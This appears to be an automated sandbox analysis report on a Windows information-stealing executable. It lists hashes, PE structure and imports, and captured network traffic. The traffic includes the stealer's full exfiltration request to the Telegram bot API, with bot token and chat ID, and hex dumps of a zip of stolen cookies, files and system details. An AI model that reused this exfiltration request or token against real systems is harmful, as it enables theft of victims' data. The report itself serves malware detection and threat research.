                                      MD5:25B555D9B19ACFF815941C2CD455D62D
                                      SHA1:B78FBE19038EAA8C7BA61CC42CD4DC74F732337B
                                      SHA-256:BB9513E6C63F62E7D323C879488B0ED00B5E00FB78B18EC0FE8342977550D6BE
                                      SHA-512:1CDB078500B65771307580340AF72D501E490A8D4C7B13B178EE49230AF3CD6A38844682F032925A6589114BFEA0CBA5A85ACBEEEB47C2B7EE890269F3FE7E47
                                      Malicious:false
                                      Preview:PK...........X...s............BJZFPPWAPT.docx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK...........X...s............BJZFPPWAPT.xlsx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1
                                      Process:C:\Users\user\Desktop\cOQD62FceM.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.017262956703125623
                                      Encrypted:false
                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                      Malicious:false
                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Entropy (8bit):6.370985643803525
                                      TrID:
                                      • Win64 Executable GUI (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:cOQD62FceM.exe
                                      File size:5'484'544 bytes
                                      MD5:af412b399914b80044340ade572bf2ab
                                      SHA1:448557087815068ea337905a61f83f02eee47c07
                                      SHA256:17b420104131c59619411e4732743ec8e9c373228613ee23731c1fd239fac7dd
                                      SHA512:f0b96f922abcf9ede936073142690b53848ea8787730936d73ea6d0ac57174efbe730388b164c83b63d3dd4c93f17fface89fac24f107dd21b46f83ca9cc9f76
                                      SSDEEP:98304:YVbklhGDTqHiSYvbuVqvxKBWwD3ZLr9IKynfJy:YqluBudBW4Lr9IKm
                                      TLSH:84468C43F6A581E9C0AEC174875B9323FB32BC890621B79B5BD49A213F23B605F5D358
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.dC?...?...?...6...-..._......._...2..._...6.......)...+...<...?.......[...%...?...8...[...>...Rich?..........................
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0x1403aaee0
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x664FF26D [Fri May 24 01:50:37 2024 UTC]
                                      TLS Callbacks:0x4023b620, 0x1
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:a570918faa90d4e27bbdd3bedba90c46
                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      call 00007FC528DD1668h
                                      dec eax
                                      add esp, 28h
                                      jmp 00007FC528DD0E97h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      nop word ptr [eax+eax+00000000h]
                                      dec eax
                                      sub esp, 10h
                                      dec esp
                                      mov dword ptr [esp], edx
                                      dec esp
                                      mov dword ptr [esp+08h], ebx
                                      dec ebp
                                      xor ebx, ebx
                                      dec esp
                                      lea edx, dword ptr [esp+18h]
                                      dec esp
                                      sub edx, eax
                                      dec ebp
                                      cmovb edx, ebx
                                      dec esp
                                      mov ebx, dword ptr [00000010h]
                                      dec ebp
                                      cmp edx, ebx
                                      jnc 00007FC528DD1038h
                                      inc cx
                                      and edx, 8D4DF000h
                                      wait
                                      add al, dh
                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x516d4c | 0x1a4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x520000 | 0x14850 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x536000 | 0x8690 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x509b80 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5099d0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3ba4a0 | 0x3ba600 | 59c3b5cdba585309d77d3d21420617a2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3bc000 | 0x15ce58 | 0x15d000 | 456be673f895c7841b9ff24db19bc678 | False | 0.3754728912965616 | data | 5.463600247898426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x519000 | 0x6f20 | 0x6200 | 8134a298a1419e24cdaa56b31e4d9614 | False | 0.41091358418367346 | data | 4.28387814324599 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x520000 | 0x14850 | 0x14a00 | d27f4caab6529c6dfe1916079dc1a9fc | False | 0.4869554924242424 | data | 6.221562344961173 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x535000 | 0x15c | 0x200 | 06c074d6698e3a07b60ecedaea074193 | False | 0.408203125 | data | 3.30133477618048 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x536000 | 0x8690 | 0x8800 | 3f1e4d07439f66c364e78743f87a5010 | False | 0.26803768382352944 | data | 5.452811289047903 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.DLL | GetConsoleMode, WriteConsoleW, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, GetCurrentProcess, ReleaseMutex, GetEnvironmentVariableW, GetModuleHandleW, FormatMessageW, GetTempPathW, SetFilePointerEx, GetFileInformationByHandleEx, GetFullPathNameW, FlushFileBuffers, FindNextFileW, CreateDirectoryW, FindFirstFileW, GetSystemInfo, WakeConditionVariable, GetStdHandle, SetFileCompletionNotificationModes, CreateIoCompletionPort, SetHandleInformation, TryAcquireSRWLockExclusive, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, DuplicateHandle, GetCurrentProcessId, CreateNamedPipeW, CreateThread, ReadFileEx, SleepEx, WriteFileEx, ReleaseSRWLockExclusive, GetCurrentThread, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, GetProcAddress, QueryPerformanceFrequency, GetSystemTimeAsFileTime, GetCurrentDirectoryW, AcquireSRWLockShared, ReleaseSRWLockShared, DeleteFileW, LoadLibraryExW, SleepConditionVariableSRW, PostQueuedCompletionStatus, GetFinalPathNameByHandleW, SetLastError, GetQueuedCompletionStatusEx, WakeAllConditionVariable, GetModuleHandleA, SwitchToThread, CreateFileW, SetFileInformationByHandle, GetModuleFileNameW, HeapReAlloc, GetProcessHeap, HeapAlloc, Sleep, GetExitCodeProcess, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, WideCharToMultiByte, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, MultiByteToWideChar, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, WaitForSingleObject, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetFileInformationByHandle, TerminateProcess, SetThreadStackGuarantee, AddVectoredExceptionHandler, CloseHandle, FindClose, QueryPerformanceCounter, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, GetLastError, AcquireSRWLockExclusive, HeapFree, EncodePointer, RaiseException, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CopyFileExW
advapi32.dll | AllocateAndInitializeSid, RegQueryValueExW, SystemFunction036, RegOpenKeyExW, FreeSid, RegCloseKey, CheckTokenMembership
api-ms-win-crt-heap-l1-1-0.dll | _msize, malloc, _set_new_mode, realloc, calloc, free
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
api-ms-win-crt-math-l1-1-0.dll | exp2f, _dclass, log, roundf, pow, ceil, __setusermatherr, powf, truncf
api-ms-win-crt-runtime-l1-1-0.dll | _configure_narrow_argv, _initialize_narrow_environment, _get_initial_narrow_environment, _seh_filter_exe, _initterm_e, _endthreadex, _register_onexit_function, _crt_atexit, _beginthreadex, abort, exit, _exit, terminate, __p___argc, _initialize_onexit_table, __p___argv, _initterm, _cexit, _c_exit, _set_app_type, _register_thread_local_exe_atexit_callback
api-ms-win-crt-stdio-l1-1-0.dll | __p__commode, _set_fmode
api-ms-win-crt-string-l1-1-0.dll | strlen, strncmp, strcspn, strcpy_s, strcmp, wcsncmp
api-ms-win-crt-time-l1-1-0.dll | _localtime64_s
api-ms-win-crt-utility-l1-1-0.dll | _rotl64, qsort
bcrypt.dll | BCryptCloseAlgorithmProvider, BCryptOpenAlgorithmProvider, BCryptGenRandom
crypt32.dll | CertDuplicateStore, CryptUnprotectData, CertFreeCertificateChain, CertDuplicateCertificateChain, CertAddCertificateContextToStore, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertCloseStore, CertVerifyCertificateChainPolicy, CertGetCertificateChain, CertOpenStore, CertFreeCertificateContext
gdi32.dll | CreateCompatibleBitmap, SelectObject, SetStretchBltMode, StretchBlt, GetDIBits, GetObjectW, DeleteObject, GetDeviceCaps, CreateCompatibleDC, CreateDCW, DeleteDC
ntdll.dll | NtDeviceIoControlFile, NtCreateFile, RtlLookupFunctionEntry, RtlCaptureContext, RtlNtStatusToDosError, NtCancelIoFileEx, RtlUnwindEx, RtlPcToFileHeader, RtlVirtualUnwind
ole32.dll | CoInitializeSecurity, CoCreateInstance, CoSetProxyBlanket, CoInitializeEx
oleaut32.dll | SafeArrayDestroy, VariantClear, SafeArrayAccessData, SafeArrayGetUBound, SysAllocStringLen, SafeArrayUnaccessData, SysFreeString, SafeArrayGetLBound
rstrtmgr.dll | RmStartSession, RmRegisterResources, RmGetList
secur32.dll | DecryptMessage, ApplyControlToken, EncryptMessage, DeleteSecurityContext, FreeCredentialsHandle, AcquireCredentialsHandleA, QueryContextAttributesW, InitializeSecurityContextW, AcceptSecurityContext, FreeContextBuffer
user32.dll | GetMonitorInfoW, EnumDisplaySettingsExW, EnumDisplayMonitors
ws2_32.dll | ioctlsocket, WSASocketW, getsockname, getpeername, setsockopt, WSAIoctl, socket, getaddrinfo, freeaddrinfo, WSAStartup, WSACleanup, WSAGetLastError, accept, closesocket, listen, bind, select, getsockopt, recv, send, WSASend, connect, shutdown
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 1, 2024 18:51:12.513715982 CEST | 64277 | 53 | 192.168.2.5 | 1.1.1.1
Jun 1, 2024 18:51:12.523109913 CEST | 53 | 64277 | 1.1.1.1 | 192.168.2.5
Jun 1, 2024 18:51:33.550728083 CEST | 50634 | 53 | 192.168.2.5 | 1.1.1.1
Jun 1, 2024 18:51:33.906915903 CEST | 53 | 50634 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 1, 2024 18:51:12.513715982 CEST | 192.168.2.5 | 1.1.1.1 | 0x6e04 | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
Jun 1, 2024 18:51:33.550728083 CEST | 192.168.2.5 | 1.1.1.1 | 0xa37d | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 1, 2024 18:51:12.523109913 CEST | 1.1.1.1 | 192.168.2.5 | 0x6e04 | No error (0) | ipwho.is | | 195.201.57.90 | A (IP address) | IN (0x0001) | false
Jun 1, 2024 18:51:33.906915903 CEST | 1.1.1.1 | 192.168.2.5 | 0xa37d | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                      • api.telegram.org
                                      • ipwho.is
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49710 | 195.201.57.90 | 80 | 6176 | C:\Users\user\Desktop\cOQD62FceM.exe
Timestamp | Bytes transferred | Direction | Data
Jun 1, 2024 18:51:12.532978058 CEST | 59 | OUT | GET /?output=json HTTP/1.1
                                      accept: */*
                                      host: ipwho.is
Jun 1, 2024 18:51:13.368062019 CEST | 941 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 01 Jun 2024 16:51:13 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Server: ipwhois
                                      Access-Control-Allow-Headers: *
                                      X-Robots-Tag: noindex
                                      Data Raw: 32 62 64 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 54 58 22 2c 22 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 32 2e 37 37 36 36 36 34 32 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 36 2e 37 39 36 39 38 37 39 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 37 35 32 30 31 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 73 22 [TRUNCATED]
                                      Data Ascii: 2bd{"ip":"173.254.250.91","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"Texas","region_code":"TX","city":"Dallas","latitude":32.7766642,"longitude":-96.7969879,"is_eu":false,"postal":"75201","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":8100,"org":"QuadraNet, Inc","isp":"Quadranet Enterprises LLC","domain":""},"timezone":{"id":"America\/Chicago","abbr":"CDT","is_dst":true,"offset":-18000,"utc":"-05:00","current_time":"2024-06-01T11:51:13-05:00"}}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49711 | 149.154.167.220 | 443 | 6176 | C:\Users\user\Desktop\cOQD62FceM.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-01 16:51:34 UTC | 1190 | OUT | POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20E26RT4853%20(1280,%201024)%0AHWID:%205059308222394286%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\cOQD62FceM.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
                                      content-type: multipart/form-data; boundary=4ee1a642069b7585-40d3276220905d9c-7e8720fa17384bed-798f4ce62581489a
                                      content-length: 980180
                                      accept: */*
                                      host: api.telegram.org
                                      2024-06-01 16:51:34 UTC | 15194 | OUT | Data Raw: 2d 2d 34 65 65 31 61 36 34 32 30 36 39 62 37 35 38 35 2d 34 30 64 33 32 37 36 32 32 30 39 30 35 64 39 63 2d 37 65 38 37 32 30 66 61 31 37 33 38 34 62 65 64 2d 37 39 38 66 34 63 65 36 32 35 38 31 34 38 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 a3 94 c1 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 a3 94 c1 58 00 00 00 00 00 00 00 00 00 00 00 00 08
                                      Data Ascii: --4ee1a642069b7585-40d3276220905d9c-7e8720fa17384bed-798f4ce62581489aContent-Disposition: form-data; name="document"; filename="[US]_173.254.250.91.zip"Content-Type: application/zipPKXAutofill/PKX
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: e6 85 92 c4 73 b3 cd fd 6c f3 c2 c8 bc 50 b6 79 6e b6 b9 9f 24 fe 2d 6c 03 10 11 bc 50 2d 79 51 d8 e6 f9 11 ff 79 6c f3 40 b6 01 90 c4 fd c2 3c 0f db fc 5b d9 e6 81 64 fe 43 d9 e6 5f 43 3c 2f db fc 47 51 9a 17 c4 36 92 78 a1 52 fc 67 52 36 5e 18 db fc 4b c4 b3 d9 e6 df cb 36 cf 4d e6 05 48 9e 9b 6d ee 27 89 17 46 36 cf 97 03 00 01 b6 79 51 d8 e6 5f 2b cc f3 65 1b db 48 e2 45 21 73 99 6d 9e 1f 19 6c f3 dc 24 61 9b e7 c7 36 92 f8 f7 b0 0d 40 91 00 b0 cd fd 24 41 1a 00 db d8 e6 81 24 91 99 dc 4f 12 00 92 b8 9f d2 dc cf 36 cf 4d 12 00 b6 79 7e 1a 46 12 61 90 84 00 db 00 d8 46 12 f7 b3 8d b9 22 05 61 70 26 f7 93 84 24 6c 43 1a db 00 44 04 92 b0 cd 03 d9 26 33 a9 b5 02 90 99 00 44 04 00 d3 34 d1 45 01 c0 34 00 6c 73 3f 49 00 d8 c6 36 00 92 90 c4 fd 64 b0 8d 6d
                                      Data Ascii: slPyn$-lP-yQyl@<[dC_C</GQ6xRgR6^K6MHm'F6yQ_+eHE!sml$a6@$A$O6My~FaF"ap&$lCD&3D4E4ls?I6dm
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 69 f6 5e fc 5b c9 c1 0b 63 9b ff 4c b6 79 61 82 17 9d 6d 6c 23 09 49 48 22 33 79 61 64 5e 64 b6 f9 8f 26 f3 2c b6 79 41 c2 5c 66 9b ff 48 b6 79 61 c4 bf 8f 6d 5e b8 e4 df 23 9a f8 f7 b0 cd 8b ca 36 ff 5a e2 85 b3 cd bf 87 d2 fc bb a4 f9 8f 60 1b db 00 48 e2 5f 2b cc b3 d8 e6 b9 89 7f 1b db bc 30 32 d8 e6 45 65 9b 17 45 98 17 89 78 e1 6c f3 40 b6 01 90 c4 03 d9 e6 81 6c 03 50 10 2f 8c cc 73 b0 cd 0b 63 9b 17 44 12 00 b6 b9 9f cc f3 b0 cd fd 32 93 88 00 c0 36 b6 91 04 80 6d 5e 10 49 00 c8 e6 81 6c f3 40 a5 14 6c 63 1b db d8 46 12 92 00 90 79 a1 6c 03 60 1b 49 dc cf 36 00 9e 1a 92 88 08 22 02 00 db d8 c6 36 92 78 20 db d8 46 12 97 d9 00 48 42 12 cf 4d e6 32 db d8 46 12 92 b0 4d 66 72 3f 49 48 e2 7e b6 b9 9f 6d 1e 48 12 b6 b9 9f 24 6c d3 5a 03 a0 94 82 24 6c
                                      Data Ascii: i^[cLyaml#IH"3yad^d&,yA\fHyam^#6Z`H_+02EeExl@lP/scD26m^Il@lcFyl`I6"6x FHBM2FMfr?IH~mH$lZ$l
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 85 8b 97 d8 3f 3c 04 60 a0 70 89 05 87 ee 18 54 00 40 80 cd fd fe 78 bc 86 5f 5a dd c0 bf 86 78 d1 d8 06 40 12 f7 b3 cd bf 97 df e8 07 c1 06 12 9c e0 04 12 10 a8 e7 de 67 fc 19 21 a1 12 14 09 45 a0 08 42 42 11 84 02 24 a2 04 52 10 0a 88 40 0a 14 01 0a 22 04 2a d4 5f fb 48 50 80 c4 fd 52 bc 70 36 2f 8c 9c fc 57 f9 da e5 0f f0 c1 1f f4 41 8c d3 c4 bf e4 e7 9e 70 c4 cf 3d f1 90 df bb 75 c5 33 76 27 1e e8 41 c7 2b af f1 a0 39 6f fe e8 0d de e2 51 1b fc 4b ba ae f2 c5 5f f2 a5 7c d6 b5 1f ce 7f 36 db 3c 50 f0 9c 6c 03 20 09 49 34 9b e7 e7 eb 86 1f e0 83 3f e8 83 18 a7 89 7f 1b 83 c1 fc eb 74 5d e5 8b bf e4 4b f9 ac 33 1f ca 8b 42 e6 59 6c f3 9f c9 36 cf 4d 86 af f5 0f f3 c1 1f f4 41 8c d3 c4 bf 8d c1 60 fe 75 ba ae f2 c5 5f f2 a5 7c f6 b1 0f e2 45 65 9b ff 48
                                      Data Ascii: ?<`pT@x_Zx@g!EBB$R@"*_HPRp6/WAp=u3v'A+9oQK_|6<Pl I4?t]K3BYl6MA`u_|EeH
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 80 24 24 61 9b cc 04 20 22 68 ad 21 09 49 3c 90 6d 00 02 91 99 00 48 c2 36 b6 b1 8d 24 24 61 9b fb 45 04 92 b0 4d 66 52 4a c1 36 d3 34 61 9b 5a 2b 00 99 89 24 ee 27 09 db d8 e6 81 fa 52 b1 4d 66 62 1b 00 49 44 04 92 68 ad 61 1b 00 49 48 42 12 99 89 6d 00 22 02 49 64 26 b6 91 44 44 20 89 36 4e 48 02 c0 36 0f 94 99 00 94 52 88 08 5a 6b b4 d6 00 88 08 24 11 11 b4 d6 88 08 a6 69 a2 94 42 d7 75 8c e3 88 6d 5a 6b 44 04 11 81 24 32 13 db 00 48 a2 50 b0 8d 6d 6c 93 99 48 22 22 88 08 32 13 db 48 a2 d6 8a 6d a6 69 c2 36 11 41 29 05 db d8 c6 36 99 c9 fd 24 31 9b cd 98 a6 89 cc 24 22 b0 4d 6b 0d 80 5a 2b a5 14 5a 6b 64 26 00 b6 b1 8d 24 22 82 fb d9 26 33 b1 4d 44 00 60 9b 5a 0a ad 35 32 93 88 40 12 92 78 20 49 dc cf 36 b6 91 04 40 66 02 20 89 88 00 20 33 91 44 44 d0
                                      Data Ascii: $$a "h!I<mH6$$aEMfRJ64aZ+$'RMfbIDhaIHBm"Id&DD 6NH6RZk$iBumZkD$2HPmlH""2Hmi6A)6$1$"MkZ+Zkd&$"&3MD`Z52@x I6@f 3DD
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: de 84 fb 3d 83 af 79 fb f7 e0 a3 7f e9 6f 81 f7 e0 17 0f 3f 9a 27 bd da c3 f9 e8 3f fc 40 7e d1 9f c0 93 de fe fd f8 e8 c7 01 7e 43 7e f1 f1 ef c1 93 de fe 3d f8 18 bf 06 3c e6 35 e1 d1 af c1 bf da 13 7e 0f 3f 7e 97 5f fc 89 57 e6 49 6f ff 1e 7c 8c 5f 03 1e f3 9a 08 91 8f bf c8 2f fe c4 2b f3 a4 57 7b 10 1f fd 87 1f c8 2f fa 13 78 d2 1b be 3e 1f fd d7 80 5f 9c af fe e3 8f e1 71 af fc 7e 7c ab 00 de 9e 5f bc ef c3 78 d2 ab 3d 94 8f fe c3 0f e4 17 fd 09 3c e9 cd df 8e 8f de 7f 29 78 d0 4b c2 63 5f 13 9e f1 b7 f0 8c 8e 5f fc c5 d7 e1 49 6f fe 56 7c cc fe 4b c2 83 5f 1a 3d f6 b5 89 a3 5d 7c b8 c9 cf 7d f9 2b f2 26 3c d3 ef 7e 15 f1 c1 3f cd 07 7c c3 ef f0 2d e5 ab d0 a7 ff 25 1c 5d 82 c3 5d 3e f0 5b 7e 97 6f e1 ab d0 a7 cd f9 c5 df 7b 7b 9e f4 31 5f cd 47 df
                                      Data Ascii: =yo?'?@~~C~=<5~?~_WIo|_/+W{/x>_q~|_x=<)xKc__IoV|K_=]|}+&<~?|-%...[~o{{1_G
